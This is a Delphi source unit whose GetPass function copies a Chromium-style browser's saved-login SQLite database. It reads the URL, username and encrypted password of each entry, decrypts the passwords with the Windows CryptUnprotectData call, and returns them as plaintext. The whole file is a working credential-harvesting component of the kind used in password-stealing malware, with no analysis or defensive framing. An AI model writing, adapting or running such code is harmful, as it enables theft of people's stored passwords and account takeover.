unit uDecrypt;

interface

uses
  windows, SQLiteTable3, sqlite3, Classes, ShlObj;

function GetPass(dir: string): string;

implementation

type
  TCharArray = Array[0..1023] Of Char;
  _TOKEN_USER = record
    User: SID_AND_ATTRIBUTES;
  end;

  TOKEN_USER = _TOKEN_USER;
  TTokenUser = TOKEN_USER;
  PTokenUser = ^TOKEN_USER;
  _CREDENTIAL_ATTRIBUTEA = record
    Keyword: LPSTR;
    Flags: DWORD;
    ValueSize: DWORD;
    Value: PBYTE;
  end;

  PCREDENTIAL_ATTRIBUTE = ^_CREDENTIAL_ATTRIBUTEA;
  _CREDENTIALA = record
    Flags: DWORD;
    Type_: DWORD;
    TargetName: LPSTR;
    Comment: LPSTR;
    LastWritten: FILETIME;
    CredentialBlobSize: DWORD;
    CredentialBlob: PBYTE;
    Persist: DWORD;
    AttributeCount: DWORD;
    Attributes: PCREDENTIAL_ATTRIBUTE;
    TargetAlias: LPSTR;
    UserName: LPSTR;
  end;

  PCREDENTIAL = array of ^_CREDENTIALA;
  _CRYPTPROTECT_PROMPTSTRUCT = record
    cbSize: DWORD;
    dwPromptFlags: DWORD;
    hwndApp: HWND;
    szPrompt: LPCWSTR;
  end;

  PCRYPTPROTECT_PROMPTSTRUCT = ^_CRYPTPROTECT_PROMPTSTRUCT;
  _CRYPTOAPI_BLOB = record
    cbData: DWORD;
    pbData: PBYTE;
  end;

  DATA_BLOB = _CRYPTOAPI_BLOB;
  PDATA_BLOB = ^DATA_BLOB;

function CryptUnprotectData(pDataIn: PDATA_BLOB; ppszDataDescr: PLPWSTR; pOptionalEntropy: PDATA_BLOB; pvReserved: Pointer; pPromptStruct: PCRYPTPROTECT_PROMPTSTRUCT; dwFlags: DWORD; pDataOut: PDATA_BLOB): BOOL; stdcall; external 'crypt32.dll' Name 'CryptUnprotectData';

function GetPass(dir: string): string;
var
  SQLiteDatabase : TSQLiteDatabase;
  SQLiteTable    : TSQLiteTable;
  TmpString      : string;
  DataFile       : string;
  TempFile       : string;
  Giren          : DATA_BLOB;
  Cikan          : DATA_BLOB;
  DataStream     : TMemorystream;
  Path           : array[0..1023] of char;
begin
  result := '';
  SHGetSpecialFolderPath(0, Path, $001C, false);
  DataFile := Path + dir;
  TempFile := Path + dir + '.tmp';
  if CopyFile(pchar(DataFile), pchar(TempFile), false) then
  begin
    SQLiteDatabase := TSQLiteDatabase.Create(TempFile);
    SQLiteTable := SQLiteDatabase.GetTable('SELECT * FROM logins');
    While not SQLiteTable.EOF do
    begin
      DataStream := TMemoryStream.Create;
      DataStream := SQLiteTable.FieldAsBlob(SQLiteTable.FieldIndex['password_value']);
      Giren.pbData := DataStream.Memory;
      Giren.cbData := DataStream.Size;
      CryptUnProtectData(@Giren, nil,nil,nil,nil,0,@Cikan);
      SetString(TmpString, PAnsiChar(Cikan.pbData), Cikan.cbData);
      Result := Result +'url: '+ SQLiteTable.FieldAsString(SQLiteTable.FieldIndex['origin_url']) + #13#10;
      Result := Result +'login: '+ SQLiteTable.FieldAsString(SQLiteTable.FieldIndex['username_value']) + #13#10;
      Result := Result +'password: '+ TmpString + ' ' + #13#10;
      Result := Result +'------------------'+ #13#10;
      SQLiteTable.Next;
    end;
    DeleteFile(pchar(TempFile));
  end;
end;

end.
